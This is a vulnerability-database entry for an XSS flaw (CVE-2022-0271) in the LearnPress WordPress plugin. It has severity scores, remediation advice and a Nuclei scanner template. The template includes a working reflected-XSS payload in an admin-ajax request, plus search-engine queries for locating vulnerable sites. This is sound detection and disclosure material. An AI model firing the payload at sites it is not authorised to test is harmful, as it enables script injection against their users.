Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-0271
HistoryApr 15, 2022 - 1:50 p.m.

LearnPress <4.1.6 - Cross-Site Scripting

2022-04-1513:50:14
ProjectDiscovery
github.com
2

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

43.6%

WordPress LearnPress plugin before 4.1.6 contains a cross-site scripting vulnerability. It does not sanitize and escape the lp-dismiss-notice before outputting it back via the lp_background_single_email AJAX action.
id: CVE-2022-0271

info:
  name: LearnPress <4.1.6 - Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: |
    WordPress LearnPress plugin before 4.1.6 contains a cross-site scripting vulnerability. It does not sanitize and escape the lp-dismiss-notice before outputting it back via the lp_background_single_email AJAX action.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Upgrade LearnPress to version 4.1.6 or later to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/ad07d9cd-8a75-4f7c-bbbe-3b6b89b699f2
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0271
    - https://nvd.nist.gov/vuln/detail/cve-2022-0271
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-0271
    cwe-id: CWE-79
    epss-score: 0.00106
    epss-percentile: 0.43227
    cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: thimpress
    product: learnpress
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/learnpress
    fofa-query: body=/wp-content/plugins/learnpress
    publicwww-query: /wp-content/plugins/learnpress
  tags: cve2022,cve,wp,wp-plugin,wordpress,learnpress,wpscan,xss,thimpress

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx<img%20src=x%20onerror=alert(document.domain)>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"dismissed":"xxx<img src=x onerror=alert(document.domain)>"}'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a0046304402205d36412bc6ab9bf5b96434628078cfeef1582f4d83725147433cda330c68122002206e97991fbc7911736bacb51ce16578e9e122c7b85bf5f0a8a35db5bff8ccdde4:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

43.6%